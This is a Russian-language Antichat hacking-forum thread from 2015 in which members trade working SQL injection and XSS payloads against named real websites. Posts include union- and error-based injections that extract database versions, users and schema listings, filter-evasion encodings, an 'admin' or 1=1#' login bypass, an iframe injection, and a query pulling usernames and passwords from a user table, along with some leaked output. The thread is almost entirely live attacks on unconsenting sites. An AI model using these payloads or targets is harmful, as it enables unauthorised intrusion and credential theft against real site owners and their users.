Уязвимости SQLi, XSS и другие.

Discussion in 'Песочница' started by Егорыч+++, 10 May 2015.

  1. Mister_Bert0ni

    Mister_Bert0ni Reservists Of Antichat

    Joined:
    10 May 2015
    Messages:
    142
    Likes Received:
    189
    Reputations:
    57
    Понял.Спасибо за наставление.
     
  2. BabaDook

    BabaDook Well-Known Member

    Joined:
    9 May 2015
    Messages:
    1,069
    Likes Received:
    1,563
    Reputations:
    40
    Вот нашёл немного, но раскрутить не могу. если кто подскажет как такие раскручивать, тогда, того поцелует сама Моника
    PHP:
    http://amurchik.com.ua/catalog/dlya-nee/?block=1&filters=&sortBy=1


    http://www.eroticland.kh.ua/index.php?nav_id=1
     
    Babadyc and Mister_Bert0ni like this.
  3. frank

    frank Level 8

    Joined:
    8 May 2015
    Messages:
    200
    Likes Received:
    95
    Reputations:
    28
    HTML:
    http://www.eroticland.kh.ua/index.php?nav_id=-1%27+and+456=78+union+select+1,2,3,version%28%29,5,6+--+
    5.1.73 вывод в title
     
    BabaDook likes this.
  4. BabaDook

    BabaDook Well-Known Member

    Joined:
    9 May 2015
    Messages:
    1,069
    Likes Received:
    1,563
    Reputations:
    40
    PHP:
    http://sex.pics-land.ru/admin/
    HTML:
     логин admin' or 1=1#
     
  5. R3hab

    R3hab Member

    Joined:
    17 May 2015
    Messages:
    117
    Likes Received:
    9
    Reputations:
    6
    PHP:
    http://www.futurefarmers.com/playshop/PJ1.php?id=-3%20union%20select%201,2,3,version(),5,6,7,8,9,10,11,12,13,14
    ТИЦ20 PR5
    5.1.72-rel14.10
     
  6. frank

    frank Level 8

    Joined:
    8 May 2015
    Messages:
    200
    Likes Received:
    95
    Reputations:
    28
    Ковырял тот что ты первый в списке вылазил, все хотел хотя бы ксс какой-нить попробовать засунуть, в итоге ничего толкового не вышло :( Получилось только вот такое, веселья для или как смотреть запрещенные сайты в обход корпоротивной прокси :)

    HTML:
    http://amurchik.com.ua/search/?q=%3Ciframe+src%3D%22http%3A%2F%2Fmicrosoft.com%22%3E%3C%2Fiframe%3E
     
  7. Filipp

    Filipp Member

    Joined:
    10 May 2015
    Messages:
    246
    Likes Received:
    56
    Reputations:
    31
  8. Babadyc

    Babadyc New Member

    Joined:
    9 May 2015
    Messages:
    25
    Likes Received:
    3
    Reputations:
    6
  9. Filipp

    Filipp Member

    Joined:
    10 May 2015
    Messages:
    246
    Likes Received:
    56
    Reputations:
    31
  10. BabaDook

    BabaDook Well-Known Member

    Joined:
    9 May 2015
    Messages:
    1,069
    Likes Received:
    1,563
    Reputations:
    40
    #50 BabaDook, 18 May 2015
    Last edited: 18 May 2015
  11. BabaDook

    BabaDook Well-Known Member

    Joined:
    9 May 2015
    Messages:
    1,069
    Likes Received:
    1,563
    Reputations:
    40
    PHP:
    http://itccst.ru/news_view.php?id=19'+and+false+/*!12345%55%6e%69%4f%4e*/+/*!12345%73%65%6c%65%63%74*/2,user(),3,database(),5+'1#
    HTML:
    http://www.matrot.ru/index.php?langue=2&page=M41H'+and+false+union+select 1,2,3,4,5/**/'1
    что-то я догнать не могу, где вывод ((
    PHP:
    http://www.keramir-iv.ru/discr.php?id=3'+and+false+union+select 1,database(),3,4,4,4,4,4,5,5,6,7,8,7,7,6,5,4,4,7/**/'1#
    этот error-base?

    //можно крутить и как error и как union
    PHP:
    http://diagnostika-plus.ru/index.php?page=dcatalog99'+%75%4e%49%4f%6e+%53%45%4c%65%63%74 1,2,database(),4,5/**/'1#
    PHP:
    http://www.spectehsnab.ru/index1.php?id=2+and+false+union+select+concat((select (@a) from (select(@a:=0x00),(select (@a) from (information_schema.columns)where
    (table_schema!=0x696e666f726d6174696f6e5f736368656d61) and  (@a)in (@a:=concat(@a,0x3c6c693e,table_schema,
    0x203a3a20,table_name,0x203a3a20,column_name,0x3c62723e))))a))#
    PHP:
    http://www.limo-pro.ru/services.php?id=34+union+select 1,version(),{f database()},4,5,user(),7,8#
    Спасибо парню, за статью))

    Господа, я потом обединю в один пост , не ругайтесь
     
    #51 BabaDook, 18 May 2015
    Last edited: 19 May 2015
    Suicide likes this.
  12. Mister_Bert0ni

    Mister_Bert0ni Reservists Of Antichat

    Joined:
    10 May 2015
    Messages:
    142
    Likes Received:
    189
    Reputations:
    57
    Code:
    http://bluegrassmidwest.com/details.php?id=.18%00' ++UNION+ALL+SELECT+1,concat(0x3c666f6e742073697a653d22352220636f6c6f723d2272656422203e7e7e496e6a6563746564204279204d69737465725f42657274306e697e7e3c68723e,0x4461746142617365203a3a,database(),0x3c62723e56457273696f4e203a3a,version(),
    0x3c62723e557365723a3a,user(),0x3c68723e3c2f666f6e743e,make_set(6,@:=0x0a,(select(1)from(information_schema.columns)where@:=make_set(511,@,0x3c6c693e,table_name,column_name)),@)),3,4,5,6,7,8,9,10,11-- -
    
    
    
    
     
  13. tiger_x

    tiger_x New Member

    Joined:
    9 May 2015
    Messages:
    27
    Likes Received:
    2
    Reputations:
    7
    HTML:
    http://www.matrot.ru/index.php?action=search&Departement=0&langue=4&page=%27and%28select%201%20from%28select%20count%28*%29%2cconcat%28%28select%20concat%28version%28%29,user%28%29%29%20from%20information_schema.tables%20limit%200%2c1%29%2cfloor%28rand%280%29*2%29%29x%20from%20information_schema.tables%20group%20by%20x%29a%29and%27
    это error-base
     
  14. smirk

    smirk Elder - Старейшина

    Joined:
    8 Sep 2011
    Messages:
    134
    Likes Received:
    41
    Reputations:
    26
  15. nopony

    nopony New Member

    Joined:
    29 Aug 2013
    Messages:
    8
    Likes Received:
    3
    Reputations:
    8
    Code:
    http://www.unimarkt.at/filialen/detailinfo/?no_cache=1&single_uid=-1+UNION SELECT 1,2,3,4,5,6,7,8,(select password from fe_users limit 0,1),10,11,12,13,(select usergroup from fe_users limit 0,1),15,16,17,18,19,20,21,22,(select username from fe_users limit 0,1),24,25,26,27
     
  16. private_static

    Joined:
    19 May 2015
    Messages:
    118
    Likes Received:
    76
    Reputations:
    22
  17. R3hab

    R3hab Member

    Joined:
    17 May 2015
    Messages:
    117
    Likes Received:
    9
    Reputations:
    6
    #57 R3hab, 20 May 2015
    Last edited: 20 May 2015
    psihoz26 likes this.
  18. Bezlishke

    Bezlishke Member

    Joined:
    18 May 2015
    Messages:
    26
    Likes Received:
    12
    Reputations:
    3
    Суть вопроса была не в этом.


    Code:
    http://www.abrasifs-friess.com/produit.php?id=999.9+union+select+1,version%28%29+--+
    5.1.73-2+squeeze+build1+1-log
    abrasifsbase
    abrasifsbase@10.0.65.161
     
    #58 Bezlishke, 20 May 2015
    Last edited: 20 May 2015
  19. Cassie)

    Cassie) New Member

    Joined:
    8 May 2015
    Messages:
    2
    Likes Received:
    0
    Reputations:
    1
  20. Cassie)

    Cassie) New Member

    Joined:
    8 May 2015
    Messages:
    2
    Likes Received:
    0
    Reputations:
    1
Loading...